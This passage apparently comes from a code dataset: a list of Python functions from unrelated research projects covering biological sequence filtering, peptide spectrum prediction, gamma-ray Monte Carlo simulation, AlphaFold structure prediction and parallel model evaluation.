print(\"Number of failed mutations:\", failed_mutations)\n # print(\"Number of sites removed:\", sites_removed)\n print(\"Number of sites after filtering:\", len(filtered_seqs))\n\n print(\"Creating m1,m2,m3 sequences...\")\n # for each of the filtered sequence, create m1,m2,m3 sequences\n seqdict = {}\n funcdict = {}\n for key in filtered_seqs:\n # Visualization part\n seqdict[\"%s-wt\" % key] = filtered_seqs[key].sequence\n # current binding site object\n bs = filtered_seqs[key]\n # get m1,m2,m3 for each wt\n for idx, mut in enumerate([[0], [1], [0, 1]]):\n # here we mutate on the first, second, and both sites\n # mut is the index of the site to abolish\n to_remove = bs.remove_pos(mut)\n mutseq = bs.abolish_sites(to_remove, mode=\"to_eliminate\",\n escore_threshold=mutate_cutoff)\n seqdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.sequence\n funcdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.plot_functions\n\n # get sequences that pass given escore gap and threshold combination\n for 
e in list(itertools.product(egaps, thresholds)):\n egapthres = e[0]\n ecutoff = e[1]\n\n # check that wt, m1, m2, m3 are valid\n if coopfilter.check_all_seqs(seqdict[\"%s-wt\" % key],\n seqdict[\"%s-m1\" % key],\n seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key],\n filtered_seqs[key].get_sites_dict(),\n escores,\n escore_cutoff=ecutoff,\n escore_gap=egapthres,\n get_complete_mutated=get_complete_mutated):\n bsites_dict = filtered_seqs[key].get_sites_dict()\n lst = [seqdict[\"%s-wt\" % key], seqdict[\"%s-m1\" % key], seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key]]\n lst, successful = clean_junctions(seqlst=lst,\n proteins=proteins,\n escores=escores,\n models=models,\n mutate_cutoff=mutate_cutoff,\n mutate_gap=mutate_gap,\n primer=\"GTCTTGATTCGCTTGACGCTGCTG\",\n max_mutate_count=max_mutate_count)\n if successful:\n # replace seqdict with the new sequences\n seqdict[\"%s-wt\" % key] = lst[0]\n seqdict[\"%s-m1\" % key] = lst[1]\n seqdict[\"%s-m2\" % key] = lst[2]\n seqdict[\"%s-m3\" % key] = lst[3]\n filtered_probes.append({\"key\": key,\n \"wt\": seqdict[\"%s-wt\" % key],\n \"m1\": seqdict[\"%s-m1\" % key],\n \"m2\": seqdict[\"%s-m2\" % key],\n \"m3\": seqdict[\"%s-m3\" % key],\n \"tf1\": bsites_dict[\"protein_1\"],\n \"tf2\": bsites_dict[\"protein_2\"],\n \"core1_start\": bsites_dict[\"core_start_1\"],\n \"core1_mid\": bsites_dict[\"core_mid_1\"],\n \"core1_end\": bsites_dict[\"core_end_1\"],\n \"core1_pref\": bsites_dict[\"score_1\"],\n \"core2_start\": bsites_dict[\"core_start_2\"],\n \"core2_mid\": bsites_dict[\"core_mid_2\"],\n \"core2_end\": bsites_dict[\"core_end_2\"],\n \"core2_pref\": bsites_dict[\"score_2\"],\n \"ecutoff\": ecutoff,\n \"egapthres\": egapthres,\n \"distance\": filtered_seqs[key].get_sites_dist(),\n \"sites_in_peak\": sitenum,\n \"peak_length\": peaklen\n })\n break # the sequence passes the filtering check, so stop\n\n # generate plots of wt, m1, m2, m3\n if generate_plots:\n filtered_es_preds = {}\n filtered_esplots = {}\n filtered_model_preds = {}\n filtered_model_plots = {}\n for protein in proteins:\n protein_num = proteins.index(protein)\n filtered_es_preds[protein] = escores[protein].predict_sequences(seqdict, key_colname=\"key\")\n filtered_esplots[protein] = escores[protein].make_plot_data(filtered_es_preds[protein], color=colors[protein_num][0])\n\n filtered_model_preds[protein] = models[protein].predict_sequences(seqdict,\n key_colname=\"key\",\n predict_flanks=predict_flanks)\n filtered_model_plots[protein] = models[protein].make_plot_data(filtered_model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n sp.plot_seq_combine([filtered_esplots, filtered_model_plots],\n filepath=\"%splot_%s_d%d_p%d.pdf\" % (analysis_path, mode, sitenum, peaklen))\n\n return filtered_probes",
"def run(self):\n\n # TODO: MOVE TO INIT?\n self.afile = write_amino_acid_masses()\n self.modfile = self.mods.write_modifications_file(mod_type=\"ptm\")\n self.modfile2 = self.mods.write_modifications_file(mod_type=\"sptm\")\n #\n\n self._read_peptide_information()\n\n if self.add_retention_time:\n logger.info(\"Adding retention time predictions\")\n rt_predictor = RetentionTime(config=self.params, num_cpu=self.num_cpu)\n rt_predictor.add_rt_predictions(self.data)\n\n # Spectrum file mode\n if self.spec_file:\n logger.info(\"Processing spectra and peptides...\")\n results = self._process_spectra()\n # Feature vectors requested\n if self.vector_file:\n self._write_vector_file(results)\n # Predictions (and targets) requested\n else:\n logger.debug(\"Merging results\")\n all_preds = self._merge_predictions(results)\n # Correlations also requested\n if self.compute_correlations:\n logger.info(\"Computing correlations\")\n correlations = calc_correlations.calc_correlations(all_preds)\n logger.info(\n \"Median correlations: \\n%s\",\n str(correlations.groupby(\"ion\")[\"pearsonr\"].median()),\n )\n if not self.return_results:\n corr_filename = self.output_filename + \"_correlations.csv\"\n logger.info(f\"Writing file {corr_filename}\")\n try:\n correlations.to_csv(\n corr_filename,\n index=True,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n correlations.to_csv(\n corr_filename,\n index=True,\n line_terminator=\"\\n\",\n )\n else:\n return correlations\n if not self.return_results:\n pae_filename = self.output_filename + \"_pred_and_emp.csv\"\n logger.info(f\"Writing file {pae_filename}...\")\n try:\n all_preds.to_csv(\n pae_filename,\n index=False,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n all_preds.to_csv(\n pae_filename,\n index=False,\n line_terminator=\"\\n\",\n )\n else:\n return all_preds\n\n # Match spectra mode\n elif self.match_spectra:\n results = self._process_peptides()\n matched_spectra = self._match_spectra(results)\n self._write_matched_spectra(matched_spectra)\n\n # Predictions-only mode\n else:\n logger.info(\"Processing peptides...\")\n results = self._process_peptides()\n\n logger.debug(\"Merging results ...\")\n all_preds = self._merge_predictions(results)\n\n if not self.return_results:\n self._write_predictions(all_preds)\n else:\n return all_preds",
"def RUN(numTrials, rateMap, numPhotons=48, angularSize=10.0, outputSize=300, mcList='MCOut.pickle',HESS=False, Sig = -1 ,numProcs = 10):\r\n print 'Beginning MC Series\\nProgress'\r\n \r\n import FermiPSF, ParseFermi\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n \r\n partial_MC_THREAD = partial( MC_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize,Sig = Sig)\r\n mcOut = p.map(partial_MC_THREAD, mcOut)\r\n \r\n# for i in range(numTrials): \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack,flatLevel = 0.0,HESS= HESS,angularSize = angularSize)\r\n# # Compute number of source photons\r\n# numMC = numPhotons - len(background[0])\r\n# # Run MC for source photons \r\n# data = MC(map,numMC,angularSize,outputSize,PSFTableFront, PSFTableBack,HESS=HESS)\r\n# # Append data\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def worker(selection_idx, results_table):\n randgen = np.random.RandomState()\n \n # Data-specific positive set partition (the real-world dataset consists of multiple motif classes, always exactly 3 instances of each class stored consequently).\n # The partition assures that the training and test sets do not share instances of the same motif class\n positive_n_train = round(0.8 * len(positive_set_) / 3) * 3\n block_start_idx = randgen.randint(positive_n_train / 3 + 1) * 3 \n block_end_idx = block_start_idx + len(positive_set_) - positive_n_train\n positive_set_part_train, positive_set_part_test = (np.concatenate((positive_set_[: block_start_idx], positive_set_[block_end_idx: ])), positive_set_[block_start_idx: block_end_idx])\n \n # Negative set partition with random selection of elements to match the size of the positive set\n negative_set = negative_set_[randgen.choice(len(negative_set_), size = positive_set_.shape[0], replace = False)]\n negative_n = len(negative_set)\n negative_n_train = round(negative_n * 0.8)\n negative_set_part_train, negative_set_part_test = (negative_set[: negative_n_train], negative_set[negative_n_train: ])\n \n data_part_train = np.float64(np.concatenate((positive_set_part_train, negative_set_part_train)))\n labels_part_train = np.concatenate((np.ones(len(positive_set_part_train), dtype = 'i1'), np.zeros(len(negative_set_part_train), dtype = 'i1')))\n data_part_test = np.float64(np.concatenate((positive_set_part_test, negative_set_part_test)))\n labels_part_test = np.concatenate((np.ones(len(positive_set_part_test), dtype = 'i1'), np.zeros(len(negative_set_part_test), dtype = 'i1')))\n \n # Specifying the pipeline and the CV structure\n pruner = feature_selection.VarianceThreshold()\n scaler = preprocessing.StandardScaler()\n feature_selector = feature_selection.SelectKBest(feature_selection.f_classif)\n classifier = svm.SVC(kernel = 'rbf', gamma = 0.01, class_weight = 'balanced')\n pipeline0 = pipeline.Pipeline([\n ('pruning', pruner),\n ('scaling', scaler),\n ('selection', feature_selector),\n ('classification', classifier)\n ])\n cv_structure = model_selection.StratifiedShuffleSplit(n_splits = 10, test_size = 0.2)\n scoring = 'recall_macro' #same as balanced accuracy\n grid = model_selection.GridSearchCV(pipeline0, scoring = scoring, param_grid = param_grid, cv = cv_structure, n_jobs = 1)\n \n # Training the pipeline, saving the data\n grid.fit(data_part_train, labels_part_train)\n results_table[selection_idx][0] = np.log10(grid.best_params_['classification__C'])\n results_table[selection_idx][1] = grid.best_params_['selection__k']\n results_table[selection_idx][2] = grid.best_score_\n \n # Testing the pipeline, saving the data\n results_table[selection_idx][3] = grid.score(data_part_test, labels_part_test)",
"def models_optimize_parallel(model, react_set, fract_opt=0.1, save_file_loc=None, fva=False, processes=cpu_count()):\n with ProcessPool(processes, initializer=species_init_Objective, initargs=(model,react_set,fract_opt)) as pool:\n try:\n if fva==True:\n future = pool.map(models_optimize_fva, [x.id for x in model.strains], timeout=100)\n future_iterable = future.result()\n pheno = list(future_iterable)\n else:\n future = pool.map(models_optimize_objective, [x.id for x in model.strains], timeout=20)\n future_iterable = future.result()\n pheno = list(future_iterable)\n except TimeoutError as error:\n print(\"function took longer than %d seconds\" % error.args[1])\n except Exception as error:\n print(\"function raised %s\" % error)\n\n if save_file_loc!=None:\n save_json_obj(dict(pheno), save_samples_dir+\"sample_\"+str(t)+\".json\")\n save_json_obj(variant_id_dec_dict, save_samples_dir+\"sample_\"+str(t)+\"_varDecision.json\")\n \n pool.close()\n pool.stop()\n pool.join()\n return pheno",
"def compute_models_parallel(data, varying_parameters=None, constant_parameters=None, n_max_processes=None):\n mp_models = MultiprocModelsRunner(MultiprocModelsWorkerLDA, data, varying_parameters, constant_parameters,\n n_max_processes=n_max_processes)\n\n return mp_models.run()",
"def evaluate_multiprocessing(\n model_paths, save_preds_to_db, save_prefix,\n X, y, labeled_indices,\n metrics, k_values,\n num_processes=4):\n num_models = len(model_paths)\n pool = Pool(processes=num_processes)\n args = zip(\n model_paths,\n range(num_models),\n repeat(save_preds_to_db, num_models),\n repeat(save_prefix, num_models),\n repeat(metrics, num_models),\n repeat(k_values, num_models),\n repeat(X, num_models),\n repeat(y, num_models),\n repeat(labeled_indices, num_models))\n\n results = [None] * num_models\n for model_index, model_results in tqdm.tqdm(\n pool.imap(evaluate_single_model_unpack_args, args),\n total=num_models, desc='Evaluating models'):\n\n results[model_index] = model_results.flatten()\n\n pool.close()\n return results",
"def run_regression_experiments(self):\n assert self.patientIDs # assert not empty\n self.log.info(\"Running experiments for {} patients\".format(len(self.patientIDs)))\n\n results_batch = defaultdict(dict)\n results_single = dict()\n for patient in self.patientIDs:\n patient_experiment = PatientPredictionExperiment(\n patient_id=patient, algorithm=self.algorithm,\n is_batch=self.isBatch\n )\n # run results for single patients\n if not self.isBatch:\n results_single[patient] = patient_experiment.run_experiment()\n self.log.debug(\"Start processing single results: {}\".format(results_single[patient]))\n # super verbose debug information should be logged with debug option\n else:\n # TODO: think about consistent interfaces\n batch_results, self._allFeatureDesp = patient_experiment.run_experiment()\n self.log.info(\"Start processing batch results with {} batches\".format(len(batch_results)))\n batchNo = 0\n for results in batch_results:\n # here are the result for each feature subset for each patients\n results_batch[batchNo][patient] = results\n batchNo += 1\n if self.algorithm == \"fm\":\n return\n if not self.isBatch:\n results_overall = self.process_results(results_single)\n self.store_results(results_overall, results_single)\n self.log.info(\"Finished running experiment\")\n else:\n self.record_batch_experiment()\n for batchNo, patient_results in results_batch.iteritems():\n # patient_results = results_single\n results_overall = self.process_results(patient_results)\n self.store_results(results_overall, patient_results, self._allFeatureDesp[batchNo])\n self.log.info(\"Finished running experiment No. {}\".format(batchNo))",
"def model_multiprocess(reservoir_dicts, dual_lists, root, run_dict,\n perm_tups=None, cores=2, machine='laptop',\n parallel=False):\n sys.setrecursionlimit(5000000)\n if parallel:\n Parallel(n_jobs=cores)(\n delayed(NM08_model_loop)(root, run_dict, res_dict, dual_list,\n perm_tup, machine, 100, k+j+m)\n for j, res_dict in enumerate(reservoir_dicts)\n for k, dual_list in enumerate(dual_lists)\n for m, perm_tup in enumerate(perm_tups)\n )\n else:\n for r_dict in reservoir_dicts:\n NM08_model_loop(root, run_dict, r_dict, machine)\n return",
"def mix_pred(self, params, smap=None, param_shapes=None):\n if self.iter == 0:\n raise RuntimeError(\"Can not mix samples before at least one \"\n \"iteration has been done.\")\n\n # Check if one or multiple parameters are requested\n if isinstance(params, str):\n only_one_param = True\n params = [params]\n smap = [smap]\n param_shapes = [param_shapes]\n else:\n only_one_param = False\n\n # Process each parameter\n mean = []\n var = []\n for ip in range(len(params)):\n\n # Gather moments from each worker\n par = params[ip]\n sit = smap[ip] if smap is not None else None\n\n if sit is None:\n # Every site contribute to the parmeter\n fit = self.workers[0].fit\n samp = fit.extract(pars=par)[par]\n # Ensure that one dimensional parameters with length 1 are not\n # scalarised\n if fit.par_dims[fit.model_pars.index(par)] == [1]:\n samp = samp[:,np.newaxis]\n par_shape = list(samp.shape)\n par_shape[0] = len(self.workers)\n # Get the moments\n ns = np.empty(len(self.workers), dtype=np.int64)\n ms = np.empty(par_shape)\n vs = np.empty(par_shape)\n ns[0] = samp.shape[0]\n ms[0] = np.mean(samp, axis=0)\n vs[0] = np.sum(samp**2, axis=0) - ns[0]*(ms[0]**2)\n for iw in range(1,len(self.workers)):\n fit = self.workers[iw].fit\n samp = fit.extract(pars=par)[par]\n # Ensure that one dimensional parameters with length 1 are\n # not scalarised\n if fit.par_dims[fit.model_pars.index(par)] == [1]:\n samp = samp[:,np.newaxis]\n # Moments of current site\n ns[iw] = samp.shape[0]\n ms[iw] = np.mean(samp, axis=0)\n samp -= ms[iw]\n np.square(samp, out=samp)\n vs[iw] = np.sum(samp, axis=0)\n\n # Combine moments\n n = np.sum(ns)\n mc = np.sum((ms.T*ns).T, axis=0)\n mc /= n\n temp = ms-mc\n np.square(temp, out=temp)\n np.multiply(temp.T, ns, out=temp.T)\n temp += vs\n vc = np.sum(temp, axis=0)\n vc /= (n-1)\n mean.append(mc)\n var.append(vc)\n\n else:\n # Parameters not consistent among sites\n par_shape = param_shapes[ip]\n ns = np.empty(len(self.workers), dtype=np.int64)\n ms = []\n vs = []\n count = np.zeros(par_shape)\n for iw in range(len(self.workers)):\n count[sit[iw]] += 1 # Check smap\n fit = self.workers[iw].fit\n samp = fit.extract(pars=par)[par]\n # Ensure that one dimensional parameters with length 1 are\n # not scalarised\n if fit.par_dims[fit.model_pars.index(par)] == [1]:\n samp = samp[:,np.newaxis]\n # Moments of current site\n ns[iw] = samp.shape[0]\n ms.append(np.mean(samp, axis=0))\n samp -= ms[iw]\n np.square(samp, out=samp)\n vs.append(np.sum(samp, axis=0))\n if np.count_nonzero(count) != count.size:\n raise ValueError(\"Arg. 
`smap` does not fill the parameter\")\n\n # Combine\n onecont = count == 1\n if np.all(onecont):\n\n # Every index has only one contribution\n mc = np.zeros(par_shape)\n vc = np.zeros(par_shape)\n for iw in range(len(self.workers)):\n mc[sit[iw]] = ms[iw]\n vc[sit[iw]] = vs[iw]/(ns[iw]-1)\n mean.append(mc)\n var.append(vc)\n\n else:\n # Combine every index\n nc = np.zeros(par_shape, dtype=np.int64)\n mc = np.zeros(par_shape)\n vc = np.zeros(par_shape)\n for iw in range(len(self.workers)):\n nc[sit[iw]] += ns[iw]\n mc[sit[iw]] += ns[iw]*ms[iw]\n mc /= nc\n for iw in range(len(self.workers)):\n temp = np.asarray(ms[iw] - mc[sit[iw]])\n np.square(temp, out=temp)\n temp *= ns[iw]\n temp += vs[iw]\n vc[sit[iw]] += temp\n vc /= (nc-1)\n\n if np.any(onecont):\n # Some indexes have only one contribution\n # Replace those with more precise values\n for iw in range(len(self.workers)):\n mc[sit[iw]] = ms[iw]\n vc[sit[iw]] = vs[iw]/(ns[iw]-1)\n\n mean.append(mc)\n var.append(vc)\n\n # Return\n if only_one_param:\n return mean[0], var[0]\n else:\n return mean, var",
"def predict_structure(prefix, model_runner_1: alphafold.model.model.RunModel,\n model_runner_3: alphafold.model.model.RunModel,\n feature_dict, Ls: list[int], model_params: haiku.Params, use_model, do_relax=False,\n random_seed=0):\n\n # Minkyung's code\n # add big enough number to residue index to indicate chain breaks\n idx_res = feature_dict['residue_index']\n L_prev = 0\n # Ls: number of residues in each chain\n for L_i in Ls[:-1]:\n idx_res[L_prev + L_i:] += 200\n L_prev += L_i\n chains = list(\"\".join([ascii_uppercase[n] * L for n, L in enumerate(Ls)]))\n feature_dict['residue_index'] = idx_res\n\n # Run the models.\n plddts, paes = [], []\n unrelaxed_pdb_lines = []\n relaxed_pdb_lines = []\n\n print(f\"Use_model {use_model}\")\n\n for model_name, params in model_params.items():\n if model_name in use_model:\n print(f\"running {model_name}\")\n # swap params to avoid recompiling\n # note: models 1,2 have diff number of params compared to models 3,4,5\n if any(str(m) in model_name for m in [1, 2]): model_runner = model_runner_1\n if any(str(m) in model_name for m in [3, 4, 5]): model_runner = model_runner_3\n model_runner.params = params\n\n processed_feature_dict: affeatures.FeatureDict = model_runner.process_features(feature_dict,\n random_seed=random_seed)\n # prediction_result is a dictionary of NumPy feature arrays\n prediction_result: dict = model_runner.predict(processed_feature_dict)\n unrelaxed_protein: protein.Protein = protein.from_prediction(processed_feature_dict, prediction_result)\n unrelaxed_pdb_lines.append(protein.to_pdb(unrelaxed_protein))\n plddts.append(prediction_result['plddt'])\n paes.append(prediction_result['predicted_aligned_error'])\n\n if do_relax:\n # Relax the prediction.\n amber_relaxer: relax.AmberRelaxation = relax.AmberRelaxation(max_iterations=0, tolerance=2.39,\n stiffness=10.0, exclude_residues=[],\n max_outer_iterations=20)\n relaxed_pdb_str, _, _ = amber_relaxer.process(prot=unrelaxed_protein)\n relaxed_pdb_lines.append(relaxed_pdb_str)\n\n # rerank models based on predicted lddt\n lddt_rank = np.mean(plddts, -1).argsort()[::-1]\n out = {}\n print(\"reranking models based on avg. predicted lDDT\")\n for n, r in enumerate(lddt_rank):\n print(f\"model_{n + 1} {np.mean(plddts[r])}\")\n\n unrelaxed_pdb_path = f'{prefix}_unrelaxed_model_{n + 1}.pdb'\n with open(unrelaxed_pdb_path, 'w') as f:\n f.write(unrelaxed_pdb_lines[r])\n set_bfactor(unrelaxed_pdb_path, plddts[r], idx_res, chains)\n\n if do_relax:\n relaxed_pdb_path = f'{prefix}_relaxed_model_{n + 1}.pdb'\n with open(relaxed_pdb_path, 'w') as f: f.write(relaxed_pdb_lines[r])\n set_bfactor(relaxed_pdb_path, plddts[r], idx_res, chains)\n\n out[f\"model_{n + 1}\"] = {\"plddt\": plddts[r], \"pae\": paes[r]}\n return out",
"def RUN_PULSAR(numTrials, rateMap, numPhotons=48,numPulsars = 6, angularSize=10.0, outputSize=100, mcList='MCOut.pickle',flatLevel = 0.0,HESS=False, Sig = -1,numProcs = 10):\r\n import FermiPSF, ParseFermi\r\n \r\n print 'Beginning MC Series\\nProgress'\r\n\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n partial_MC_PULSAR_THREAD = partial( MC_PULSAR_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize, numPulsars = numPulsars,Sig=Sig)\r\n mcOut = p.map(partial_MC_PULSAR_THREAD, mcOut)\r\n \r\n# for i in range(numTrials):\r\n# np.random.seed()\r\n# # Compute number of background photons\r\n# numSignal = np.random.poisson(lam = .25*numPhotons)\r\n# if (HESS == True):\r\n# numSignal = np.random.poisson(lam = .05*numPhotons)\r\n# if Sig >= 0:\r\n# numSignal = np.random.poisson(lam = Sig*numPhotons)\r\n# \r\n# bg = numPhotons-numSignal # number of BG photons\r\n# \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack ,HESS=HESS, angularSize = angularSize )\r\n# \r\n# \r\n# # Run MC for source photons \r\n# data = MC_PULSAR(map,numSignal, numPulsars,angularSize,outputSize,PSFTableFront, PSFTableBack, HESS = HESS)\r\n# # Concatenate and append this run to the simulation output\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def solve_all_parallel(self, use_cache=True):\n self.generate_test_instances()\n\n # workers = multiprocessing.cpu_count()/2\n workers = 8\n\n # create two queues: one for files, one for results\n work_queue = multiprocessing.Queue()\n done_queue = multiprocessing.Queue()\n processes = []\n\n # add filepaths to work queue\n # format is (problemID, configID)\n # start processes\n if use_cache:\n cachedResults = {}\n try:\n with open(self.cacheFile, \"rb\") as f:\n cachedResults = pkl.load(f)\n except: # pragma: no cover\n print(\"Creating new cache file: {}\".format(self.cacheFile))\n with open(self.cacheFile, \"wb\") as f:\n for instance in self.instances:\n instancehash = hash(instance)\n if instancehash in cachedResults:\n # Retrieve TestResult from the results dictionary:\n self.results.append(cachedResults[instancehash])\n else:\n # Add this result to the cache\n work_queue.put((instance.testproblem.problemID, instance.solverconfig.configID))\n\n else:\n for instance in self.instances:\n work_queue.put((instance.testproblem.problemID, instance.solverconfig.configID))\n\n for w in range(workers):\n p = multiprocessing.Process(target=worker,\n args=(self.problemDir,\n self.configDir,\n work_queue,\n done_queue))\n p.start()\n processes.append(p)\n work_queue.put((STOP,STOP))\n\n # Poll done_queue and empty it right away.\n # keep track of the number of poison pills we get-\n # once it's equal to the number of workers, stop.\n processes_left = workers\n while processes_left:\n\n if not done_queue.empty():\n result = done_queue.get()\n if result == STOP:\n processes_left -= 1\n print(\"Processes left: {}\".format(str(processes_left)))\n else:\n self.results.append(result)\n if use_cache: # Add new cached result to the cache.\n with open(self.cacheFile, \"wb\") as f:\n cachedResults[result.instancehash] = result\n pkl.dump(cachedResults, f)\n time.sleep(0.5) # Wait for processes to run.\n\n for p in processes:\n print(\"process {} exited with code {}\".format(p,p.exitcode))\n return",
"def run_models(X_train, X_test, Y_train, Y_test, models_list, dataframe_name):\n results = []\n for type, model in models_list:\n model.fit(X_train, Y_train)\n Y_predict = model.predict(X_test)\n accuracy = accuracy_score(Y_test, Y_predict)*100\n results.append([type, accuracy, dataframe_name])\n return results",
"def main():\n pool = Pool(processes=50)\n results = pool.imap_unordered(experiment, range(50), chunksize=1)\n\n # Output\n offset = 1\n # for i, (data_surv, data_order, data_ctrl) in enumerate(results):\n for i, (data_surv, data_ctrl) in enumerate(results):\n with open(f'../data/reproductive_barrier/hybrid_survival_percentage/experiment_{i+offset}.csv', 'w') as fp:\n for t, surv in data_surv:\n fp.write(f'{int(t)},{float(surv)}\\n')\n\n with open(f'../data/reproductive_barrier/order_of_incompatibility/experiment_{i+offset}.csv', 'w') as fp:\n for x in data_order:\n fp.write('%d,' % int(x[0]) + ','.join(map(str, x[1:])) + '\\n')\n\n with open(f'../data/reproductive_barrier/control_survival_percentage/experiment_{i+offset}.csv', 'w') as fp:\n for t, surv in data_ctrl:\n fp.write(f'{int(t)},{float(surv)}\\n')\n\n return",
"def process_outputs(self, data, output, save=True):\n\n pred_spline = output['pred_polys']\n\n # preds = self.spline.sample_point(pred_spline)\n preds = pred_spline\n torch.cuda.synchronize()\n preds = preds.cpu().numpy()\n\n pred_spline = pred_spline.cpu()\n pred_spline = pred_spline.numpy()\n\n instances = data['instance']\n polys = []\n results = []\n for i, instance in enumerate(instances):\n detection = defaultdict(float)\n poly = preds[i]\n poly = poly * data['patch_w'][i]\n poly[:, 0] += data['starting_point'][i][0]\n poly[:, 1] += data['starting_point'][i][1]\n detection['image_id'] = instance['image_path']\n img_h, img_w = instance['height'], instance['width']\n\n detection['poly'] = poly\n detection['image_size'] = [img_w, img_h]\n # pred_sp = pred_spline[i]\n # pred_sp = pred_sp * data['patch_w'][i]\n # pred_sp[:, 0] += data['starting_point'][i][0]\n # pred_sp[:, 1] += data['starting_point'][i][1]\n #\n # instance['spline_pos'] = pred_sp.tolist()\n\n polys.append(poly)\n\n results.append(detection)\n\n\n # if save:\n\n # predicted_poly = []\n\n\n\n # pred_mask = np.zeros((img_h, img_w), dtype=np.uint8)\n # utils.draw_poly(pred_mask, poly.astype(np.int))\n # predicted_poly.append(poly.tolist())\n #\n # # gt_mask = utils.get_full_mask_from_instance(\n # # self.min_area,\n # # instance)\n #\n # instance['my_predicted_poly'] = predicted_poly\n # # instance_id = instance['instance_id']\n # image_id = instance['image_id']\n #\n # pred_mask_fname = os.path.join(self.output_dir, '{}_pred.png'.format(image_id))\n # instance['pred_mask_fname'] = os.path.relpath(pred_mask_fname, self.output_dir)\n #\n # # gt_mask_fname = os.path.join(self.output_dir, '{}_gt.png'.format(instance_id))\n # # instance['gt_mask_fname'] = os.path.relpath(gt_mask_fname, self.output_dir)\n #\n # instance['n_corrections'] = 0\n #\n # info_fname = os.path.join(self.output_dir, '{}_info.json'.format(image_id))\n #\n # with warnings.catch_warnings():\n # warnings.simplefilter(\"ignore\")\n # sio.imsave(pred_mask_fname, pred_mask)\n # # sio.imsave(gt_mask_fname, gt_mask)\n #\n # # print '==> dumping json'\n # with open(info_fname, 'w') as f:\n # json.dump(instance, f, indent=2)\n\n return results, polys",
"def predict(self, peptides, **kwargs):\n raise NotImplementedError",
"def post_process(dtw_threshold, fidx, TESTSET_NAME):\n\n data_dir = str(Path(os.getcwd()).parent) + '/data/{}/'.format(TESTSET_NAME)\n X_test = np.load(data_dir+'/processed_dataset/scaled_ppgs.npy')\n y_seg_trues = np.load(data_dir+'/processed_dataset/seg_labels.npy')\n\n working_dir = 'results/{}/{}/dtw_thresh_{}/'.format(TESTSET_NAME, fidx, dtw_threshold)\n\n check_mkdir('results/{}'.format(TESTSET_NAME))\n check_mkdir('results/{}/{}/'.format(TESTSET_NAME, fidx))\n check_mkdir(working_dir)\n\n pool_args = []\n for row in X_test:\n pool_args.append([row, dtw_threshold, fidx])\n pool = Pool(processes=8)\n y_seg_preds = pool.starmap(make_predictions, pool_args)\n pool.terminate()\n\n y_seg_preds = np.asarray(y_seg_preds)\n np.save(working_dir+'/y_pred_{}.npy'.format(dtw_threshold), y_seg_preds)\n np.save(working_dir+'/y_true_{}.npy'.format(dtw_threshold), y_seg_trues)",
